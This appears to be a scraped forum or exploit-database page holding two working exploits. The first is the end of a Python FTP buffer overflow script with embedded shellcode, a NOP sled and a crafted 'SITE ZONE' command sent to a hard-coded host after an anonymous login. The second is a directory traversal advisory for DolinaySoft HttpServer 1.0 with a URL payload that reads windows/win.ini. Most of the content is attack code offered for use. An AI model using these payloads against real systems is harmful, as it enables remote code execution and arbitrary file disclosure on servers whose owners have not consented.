"\xd5\x61\x3a\x5d\xd5\x2d\x6e\x31\x80\xfb\xd8\xf7\x7a\x4a\xb2" "\xa1\xd1\x04\x52\x37\x1a\x97\x24\x38\x77\x61\xc8\x89\x2e\x34" "\xf7\x26\xa7\xb0\x80\x5a\x57\x3e\x5b\xdf\x67\x75\xc1\x76\xe0" "\xd0\x90\xca\x6d\xe3\x4f\x08\x88\x60\x65\xf1\x6f\x78\x0c\xf4" "\x34\x3e\xfd\x84\x25\xab\x01\x3a\x45\xfe") buffer = '\x90' * 30 + shellcode buffer1 = '\x4C' * 242 + ret + buffer + '\x41' * (749-len(buffer)) print "Sending Buffer" s = socket.socket(socket.AF_INET, socket. SOCK_STREAM) connect = s.connect(('192.168.1.150', 21)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('SITE ZONE' + buffer1 + '\r\n') s.close()
  14. Hacking

    # Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal # Date: 2017-03-19 # Exploit Author: malwrforensics # Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtml#download # Version: 1.0 # Tested on: Windows Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Example: Assuming the root folder is c:\<app_folder>\<html_folder> http://<server>/..%5c..%5c/windows/win.ini
×